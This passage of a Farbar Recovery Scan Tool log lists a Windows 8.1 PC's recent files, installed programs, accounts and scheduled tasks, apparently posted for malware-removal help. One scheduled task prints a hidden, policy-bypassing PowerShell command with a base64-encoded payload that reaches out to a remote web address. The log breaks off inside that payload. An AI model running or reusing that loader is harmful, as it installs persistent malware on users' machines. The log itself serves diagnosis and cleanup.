S3 vhidmini; \SystemRoot\System32\drivers\walvhid.sys [X]
S3 WinDivert1.1; \??\C:\Program Files\KMSpico\WinDivert.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-03 00:26 - 2016-02-03 00:26 - 00015307 _____ C:\Users\Neki\Desktop\FRST.txt
2016-02-03 00:25 - 2016-02-03 00:26 - 00000000 ____D C:\FRST
2016-02-03 00:24 - 2016-02-03 00:24 - 02370560 _____ (Farbar) C:\Users\Neki\Desktop\FRST64.exe
2016-02-02 23:55 - 2016-02-02 23:55 - 00001978 _____ C:\Users\Neki\Desktop\JRT.txt
2016-02-02 23:46 - 2016-02-02 23:46 - 01609032 _____ (Malwarebytes) C:\Users\Neki\Desktop\JRT.exe
2016-02-02 23:35 - 2016-02-02 23:39 - 00003416 _____ C:\Users\Neki\Desktop\AdwCleaner LOG.txt
2016-01-30 17:11 - 2016-01-30 17:11 - 00002264 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-01-30 17:11 - 2016-01-30 17:11 - 00002235 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-30 17:06 - 2016-01-30 17:10 - 45847120 _____ (Google Inc.) C:\Users\Neki\Downloads\ChromeStandaloneSetup.exe
2016-01-30 13:59 - 2016-02-03 00:04 - 00000908 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-30 13:59 - 2016-02-02 23:37 - 00000904 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-30 13:59 - 2016-01-30 13:59 - 00003880 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-01-30 13:59 - 2016-01-30 13:59 - 00003644 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-01-30 13:58 - 2016-01-30 13:59 - 00987728 _____ (Google Inc.) C:\Users\Neki\Downloads\ChromeSetup.exe
2016-01-30 12:51 - 2016-01-30 12:52 - 00000000 ____D C:\Users\Neki\AppData\Local\Deployment
2016-01-30 12:51 - 2016-01-30 12:51 - 00000000 ____D C:\Users\Neki\AppData\Local\Apps\2.0
2016-01-30 03:06 - 2016-01-30 03:06 - 94824363 _____ C:\Users\Neki\Desktop\MarcelinesHouse_Regular_Windows_0_5_1.zip
2016-01-30 00:13 - 2016-01-30 00:14 - 05216656 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-29 23:37 - 2016-01-29 23:37 - 00000000 ____D C:\Users\Neki\AppData\Roaming\Sun
2016-01-29 23:37 - 2016-01-29 23:37 - 00000000 ____D C:\Users\Neki\.oracle_jre_usage
2016-01-29 23:32 - 2016-01-29 23:32 - 00000000 ____D C:\Users\Neki\AppData\LocalLow\Oracle
2016-01-26 23:32 - 2016-02-01 22:33 - 00000868 _____ C:\Users\Neki\Desktop\Vocabulary List.txt
2016-01-25 03:59 - 2016-02-02 17:18 - 00000339 _____ C:\Users\Neki\Desktop\last night.txt
2016-01-23 13:55 - 2016-01-23 13:55 - 01505280 _____ C:\Users\Neki\Desktop\Adwcleaner 5.030.exe
2016-01-19 22:56 - 2016-01-19 23:10 - 259447553 _____ C:\Users\Neki\Desktop\David Firth _ Heroes of Animation with Bing.mp4
2016-01-19 20:29 - 2016-01-29 22:25 - 00000000 ____D C:\ProgramData\{293c6f85-1064-1}
2016-01-19 20:29 - 2016-01-19 20:29 - 00019342 _____ C:\Windows\System32\Tasks\{FA5771BF-F746-C238-6653-39E53BF5AD97}
2016-01-19 20:29 - 2016-01-19 20:29 - 00000000 ____D C:\ProgramData\{11322393-4064-0}
2016-01-18 02:03 - 2016-01-18 03:30 - 03944774 _____ C:\Users\Neki\Desktop\Weiss Side Braid.psd
2016-01-15 17:17 - 2016-01-16 01:53 - 00000212 _____ C:\Users\Neki\Desktop\I'm that Kind of artist.txt
2016-01-14 16:19 - 2016-01-14 16:19 - 00000000 ____D C:\Users\Neki\Downloads\Archives
2016-01-14 16:18 - 2016-01-14 16:18 - 00000000 ____D C:\Users\Neki\Downloads\Torrent Files
2016-01-14 03:16 - 2016-01-14 17:07 - 00000000 ____D C:\Users\Neki\Desktop\DH
2016-01-14 00:10 - 2015-01-19 16:53 - 00999936 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00256000 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbnet.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00196608 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juwwanecm.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00121600 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00117248 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwusbdev.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00093696 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcacm.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00085504 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jubusenum.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00055296 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcecm.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00032768 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00029184 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juextctrl.sys
2016-01-14 00:10 - 2015-01-19 16:53 - 00013952 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbenumfilter.sys
2016-01-12 23:53 - 2016-02-01 21:30 - 01681993 _____ C:\Users\Neki\Desktop\Weiss Schnee Practice.psd
2016-01-08 15:40 - 2016-01-14 03:16 - 3023442527 _____ C:\Users\Neki\Desktop\My Little Pony Equestria Girls Rainbow Rocks (1080p)
2016-01-08 11:41 - 2016-01-08 17:33 - 00000000 ____D C:\Users\Neki\Desktop\My Little Pony Equestria Girls (2013) [1080p] {5.1}
2016-01-07 16:24 - 2016-01-15 00:26 - 00000124 _____ C:\Users\Neki\Desktop\LATEST LATEST ZELDA.txt
2016-01-05 13:38 - 2016-01-05 13:39 - 00000092 _____ C:\Users\Neki\Desktop\Marcelee.txt
2016-01-05 00:59 - 2016-01-05 00:59 - 01002019 _____ C:\Users\Neki\Desktop\Ciri.psd
2016-01-04 13:17 - 2016-01-08 02:07 - 01172758 _____ C:\Users\Neki\Desktop\Gwen Stacy Sketchdump2.psd
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-03 00:17 - 2014-03-18 18:04 - 00992970 _____ C:\Windows\system32\PerfStringBackup.INI
2016-02-03 00:17 - 2013-08-22 21:36 - 00000000 ____D C:\Windows\Inf
2016-02-02 23:37 - 2013-08-22 22:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-02-02 23:36 - 2013-08-22 21:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-02-02 23:35 - 2015-07-01 15:53 - 00000000 ____D C:\AdwCleaner
2016-02-02 23:22 - 2015-01-16 19:07 - 00000000 ____D C:\Users\Neki\AppData\Roaming\vlc
2016-02-02 02:01 - 2015-01-24 08:34 - 00000000 ____D C:\Users\Neki\AppData\Local\Adobe
2016-02-01 19:06 - 2015-01-06 22:47 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1800402837-2610492725-117470784-1001
2016-02-01 11:33 - 2015-01-06 13:22 - 00000000 ____D C:\Users\Neki
2016-01-31 22:44 - 2015-11-25 00:11 - 00002898 _____ C:\Users\Neki\Desktop\Things to do PC Edition.txt
2016-01-31 22:42 - 2015-09-06 00:35 - 00001481 _____ C:\Users\Neki\Desktop\Things I Wanna Animate.txt
2016-01-31 01:36 - 2015-11-19 15:43 - 00000380 _____ C:\Users\Neki\Desktop\GAMES TO PLAY.txt
2016-01-30 17:35 - 2015-01-22 22:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-01-30 17:35 - 2015-01-22 22:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-01-30 17:10 - 2015-01-07 14:20 - 00000000 ____D C:\Program Files (x86)\Google
2016-01-29 23:38 - 2015-03-17 10:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-29 23:38 - 2015-03-17 10:05 - 00000000 ____D C:\ProgramData\Oracle
2016-01-29 23:38 - 2015-03-17 10:05 - 00000000 ____D C:\Program Files (x86)\Java
2016-01-29 23:37 - 2015-03-17 10:06 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-01-29 22:24 - 2013-08-22 23:36 - 00000000 ____D C:\Windows\system32\NDF
2016-01-25 01:09 - 2015-01-10 15:41 - 00000000 ____D C:\Users\Neki\Desktop\Sci-Chris
2016-01-23 14:33 - 2015-06-20 22:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Portal
2016-01-23 14:33 - 2015-01-17 12:11 - 00000000 ____D C:\Windows\Minidump
2016-01-23 14:33 - 2015-01-08 18:04 - 00000000 ____D C:\Users\Neki\AppData\Roaming\uTorrent
2016-01-23 13:34 - 2015-02-09 11:40 - 00002520 _____ C:\Users\Neki\Desktop\What I want to Draw.txt
2016-01-18 04:18 - 2015-12-20 19:36 - 00000000 ____D C:\Users\Neki\AppData\Roaming\Stellarium
2016-01-16 01:55 - 2015-11-02 19:49 - 00000228 _____ C:\Users\Neki\Desktop\Make memes.txt
2016-01-15 02:57 - 2015-09-14 20:07 - 00000403 _____ C:\Users\Neki\Desktop\Star x Marco Comic.txt
2016-01-14 00:55 - 2013-08-22 23:36 - 00000000 ____D C:\Windows\LiveKernelReports
2016-01-12 23:11 - 2015-01-06 13:22 - 00000000 ____D C:\Users\Neki\AppData\Roaming\Adobe
2016-01-09 00:08 - 2013-08-22 23:36 - 00000000 ____D C:\Windows\system32\FxsTmp
2016-01-08 01:37 - 2016-01-01 21:59 - 00000424 _____ C:\Users\Neki\Desktop\LATEST.txt
2016-01-07 15:04 - 2015-11-28 01:25 - 00000881 _____ C:\Users\Neki\Desktop\Things I was doing last night.txt
2016-01-04 18:26 - 2016-01-02 19:28 - 00000000 ____D C:\Users\Neki\Desktop\Hotel Transylvania 2 (2015)
 
==================== Files in the root of some directories =======
 
2015-02-14 18:24 - 2016-01-03 00:48 - 0000132 _____ () C:\Users\Neki\AppData\Roaming\Adobe PNG Format CC Prefs
2015-11-10 23:40 - 2015-11-10 23:41 - 0002292 _____ () C:\Users\Neki\AppData\Roaming\ASSDraw3.cfg
2015-03-09 19:24 - 2015-03-09 19:24 - 0000038 ___SH () C:\Users\Neki\AppData\Local\69ff07055291669bb2b218.72821112
2015-03-09 19:32 - 2015-03-09 19:32 - 0000038 ___SH () C:\Users\Neki\AppData\Local\70149b02515b3bb20dd492.47983420
2015-06-22 21:44 - 2015-06-22 21:44 - 212588673 _____ () C:\Users\Neki\AppData\Local\ACCCx3_1_1_110.zip.aamdownload
2015-06-22 21:44 - 2015-06-22 21:44 - 0002489 _____ () C:\Users\Neki\AppData\Local\ACCCx3_1_1_110.zip.aamdownload.aamd
2015-05-11 23:37 - 2015-05-11 23:37 - 0000000 _____ () C:\Users\Neki\AppData\Local\Temp.dat
2015-06-30 21:43 - 2015-06-30 21:43 - 0000000 _____ () C:\Users\Neki\AppData\Local\{E0FA8E34-A2F1-407A-ADD4-5109F5A129FB}
2015-11-26 15:00 - 2015-11-26 15:01 - 0000000 _____ () C:\Users\Neki\AppData\Local\{E6810BF9-BD15-4360-86AC-19DD1836CFF5}
 
Some files in TEMP:
====================
C:\Users\Neki\AppData\Local\Temp\jre-8u71-windows-au.exe
C:\Users\Neki\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-01 19:51
 
==================== End of FRST.txt ============================

 

 

[4] Addition =========================================================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-01-2016

Ran by Neki (2016-02-03 00:27:02)
Running from C:\Users\Neki\Desktop
Windows 8.1 Pro (X64) (2015-01-06 05:22:00)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1800402837-2610492725-117470784-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1800402837-2610492725-117470784-1002 - Limited - Enabled)
Guest (S-1-5-21-1800402837-2610492725-117470784-501 - Limited - Disabled)
Neki (S-1-5-21-1800402837-2610492725-117470784-1001 - Administrator - Enabled) => C:\Users\Neki
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
Adobe Flash Player 19 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 19.0.0.245 - Adobe Systems Incorporated)
Adobe Flash Professional CC (HKLM-x32\...\{B56B95BF-7161-4166-8288-DB1BA9F6C9B8}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Photoshop CC (HKLM-x32\...\{2D99B50E-431D-4AA8-85C1-172A6F8BCF09}) (Version: 14.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Adobe Update Management Tool (HKLM-x32\...\{534A7A1A-7102-4AF6-23EA-7CD279C7B625}_is1) (Version: 6.2 - PainteR)
Aegisub 3.2.2 (HKLM\...\{24BC8B57-716C-444F-B46B-A3349B9164C5}_is1) (Version: 3.2.2 - Aegisub Team)
Audacity 2.1.0 (HKLM-x32\...\Audacity_is1) (Version: 2.1.0 - Audacity Team)
CCleaner (HKLM\...\CCleaner) (Version: 5.07 - Piriform)
Construct 2 r194.2 (HKLM\...\Construct 2_is1) (Version: 1.0.194.2 - Scirra)
DAEMON Tools Ultra (HKLM-x32\...\DAEMON Tools Ultra) (Version: 2.3.0.0254 - Disc Soft Ltd)
Encarta Search Bar (64-bit) (HKLM\...\{08044040-959A-4B0D-8825-2C533F0DDB19}) (Version: 1.0.0 - Microsoft)
EPSON L210 Series Printer Uninstall (HKLM\...\EPSON L210 Series) (Version:  - SEIKO EPSON Corporation)
ESBUnitConv (HKLM-x32\...\ESBUnitConv4_is1) (Version: 7.4.0.0 - ESB Consultancy)
Free File Viewer 2014 (HKLM-x32\...\FreeFileViewer_is1) (Version: 2014.2.16.0 - Bitberry Software) <==== ATTENTION
Free Studio version 6.5.3.713 (HKLM-x32\...\Free Studio_is1) (Version: 6.5.3.713 - DVDVideoSoft Ltd.)
GeoGebra 5 (HKLM-x32\...\GeoGebra 5) (Version: 5.0.168.0 - International GeoGebra Institute)
Globe Tattoo Broadband (HKLM-x32\...\Globe Tattoo Broadband) (Version: 21.005.11.00.158 - Huawei Technologies Co.,Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.97 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Java 8 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218071F0}) (Version: 8.0.710.15 - Oracle Corporation)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version:  - )
Learning Essentials for Microsoft Office (HKLM-x32\...\{75F3A4B2-F6E8-434D-A2EF-DBBC016C6CB2}) (Version: 2.0 - Microsoft)
Macromedia Shockwave Player (HKLM-x32\...\Macromedia Shockwave Player) (Version:  - )
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft Math (HKLM-x32\...\{07043840-959A-4B0D-8825-2C533F0DDB19}) (Version: 2007 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4734.1000 - Microsoft Corporation)
Microsoft Student 2007 for Learning Essentials (HKLM-x32\...\{Microsoft Student 2007_54A0E938-8390-489F-8F1A-563673334DFE}) (Version:  - )
Microsoft Student with Encarta Premium 2009 (HKLM-x32\...\{09041881-2C94-4A67-8E55-8483C019C7D2}) (Version: 2009 - Microsoft Corporation)
Microsoft Text-to-Speech Engine 4.0 (English) (HKLM-x32\...\MSTTS) (Version:  - )
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Minecraft1.8.3 (HKLM-x32\...\Minecraft1.8.3) (Version:  - )
Mobile Broadband HL Service (HKLM-x32\...\Mobile Broadband HL Service) (Version: 22.001.22.00.158 - Huawei Technologies Co.,Ltd)
Movavi Screen Capture Studio 5 (HKLM-x32\...\Movavi Screen Capture Studio 5) (Version: 5.0.0 - MOVAVI)
Mozilla Firefox 35.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 35.0 (x86 en-US)) (Version: 35.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 35.0 - Mozilla)
Mp3tag v2.70 (HKLM-x32\...\Mp3tag) (Version: v2.70 - Florian Heidenreich)
PDF Settings CC (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
RAR Password Unlocker 4.2.0.0 (HKLM-x32\...\{B789FA51-6A71-408F-92DE-EDE4A517B8F9}_is1) (Version:  - Password Unlocker Studio)
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Stellarium 0.14.1 (HKLM\...\Stellarium_is1) (Version: 0.14.1 - Stellarium team)
Unity Web Player (HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\UnityWebPlayer) (Version: 4.6.1f1 - Unity Technologies ApS)
Virtua Fighter 2 V1.0E (HKLM-x32\...\Virtua Fighter 2) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.8-6 - Wacom Technology Corp.)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WinRAR 5.21 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.1 - win.rar GmbH)
XAMPP (HKLM-x32\...\xampp) (Version: 5.6.3-0 - Bitnami)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {870FA402-396D-4013-938C-B6C5F3010F22} - System32\Tasks\{B2982742-0A9E-4457-8B9F-01ACD6242E6E} => pcalua.exe -a "C:\Program Files (x86)\bestadblocker\gKdQruQljZApDw.exe" -c /s /n /i:"ExecuteCommands;UninstallCommands" ""
Task: {9D9E7CB3-BEB0-4E79-899C-4E979C02D52D} - System32\Tasks\{FA5771BF-F746-C238-6653-39E53BF5AD97} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHUAcwBhAGYAdQBuAC4AaQBuAGYAbwAvAHUALwA/AHEAPQBFAE8ALQBkAFIAUQBQAEMAYQBJAHEAMgBzAEUAcwBDAEEAVAA3AHcATgB5ADYAVgBCAG8ASQBRAG8ASQBhAFYAaQBQAG8ANwBnADcASQAwAEIAVwB0AE0ASQBsADAAagA3AFcASAB1AEQAQgBTAG0AcwBzAFIAUQBVAE0AdwBVAGUARQBhAGwAMwBVAFkAeABpAFYAMQBqAHQAYQBEAEgAWQBrAC0ANwB1AEYAMQBrAFgAQgBnAHoANwBJAFkAQwBRAGkAdQBYADkAQwB2AHcAYwB5ADAANABXAHYANQB6AEcATAAxAG4AZABXAEsAMgBLAHkATwBkAGoASwB1AFEANQBXAE4ATwBJAFUAVABUAHoAYwA4AFQAOABMAEEAcQBzAHEANAB2AEcAdwB5AEEASgAtAEQAcQBNAEQARQByAEsAcQBOAGMAawBHAEcASQBPAGUASQAxAEgAdgA3AG4AMgAwAGcAeQA4AHIAOABhAHgAcQAwADcAbwBoADYASwBRAHUAWgA4AFoAdgBuAHIAMwBRAFcAbAB6AHEAagBYAEMANAAwAGgAYgBRAFAAbAB1AGMAdABjAE8ASAAtAGYAaQBvAEkARAA0AC0AeABrAG0ARgBkAEQASAByAHgATAAzAG4AbABXAGkARgA2AF8AYQBGAEcAVgB0AGUAeABlAHAAQgBnAGkAYwBrAEkAegA0AEsAZQBUAEQAZQA1AEMATwA5AFUAdAAxAGUAQwBBAFMAQgAxAHMANABPAFcAYQBBAGEAYQAyAFYAVwBuADMATgBKADkAYwA4ADkARgBkAEcAMgBBAGEAdgBNAGcAXwBQAFgAdwBPAFkAbgBKAGgAYgBjADMAZgB5AE8AQwBjAFUAQgBWAGUAdQBMAGIARQBoAE0AagBiAEgAagA0ADcAeQBqAGIAWABpAEEATQByAHUAUABHAF8AcQBaAHEAbgBLAF8AUABwAFUAZgBOAEMAUAB0AFMAbQBnAHIATgB1AFMAaQBqAFQAUwBIAHkAdgBEAGYAZQBUAFQATwA2ADMANgAxADQAeQBGADgATQBSADIAVgBCAFkAaABLAEwAQQBrAEkAYQA3AHcASAAtAHUATgBkAFcAeQAtAGcAcgBRAHUAMgBfADEAdAAwAEEATwB1ADAAMwB6AEUAVABsAGcARgAyAFIASABzADgANAA4AFoAVgB6AFYAXwBCAEMAOQBEAF8AYwAxAHIAXwBhAGIAagBHADcAJgBjAD0AegBKAC0AYgBxAGwAMQAxAFIARQBmAFYAWgBWAE8AUwBnAGEAUgBsAFUAdABJAHQAWQBHAFgALQBPAHcASABWAHkANwBYAE8AUgB2AHoANwAzAGoAMwAzAGwAYQBQAFQASQBwAFIAYQBRADIAUgBtAFcAaABKAGgAegA5ADIASAB1AGUAVwB4AHAAXwB5ADMAVgBTAFoAZwA4AG0AYwBEAHMAVgBPAGQAUQB5AF8AbQBJADcAYwBnAE8AbQB6AFIAdwB2AFkAdAAxAHEANABJAEUAbQBqADAAWABjAE8ALQAzADQAZABLAEQAQgBKAEIARwB4AFUATwBHAGIARABtAGsAawBQADkARQBfAEgAMQBUAHYAYwA5ADUAXwBSAGQASgBXAFQARwBUAEwAMABYAHoAagBZAHUAMwBOAHcAYQBZAC0AMwBlAEsAMwBKAFYAYwBCAEQARwBTAEIAYQBkAEUAeQBPAEkAUAB5AE4ATgBIAHcANwBSAFQARgBlAGYAMQBnAE8AegBlAGgAXwBOAEEAcQBwAGEATABwAHoAWAB3AFkAVQBpA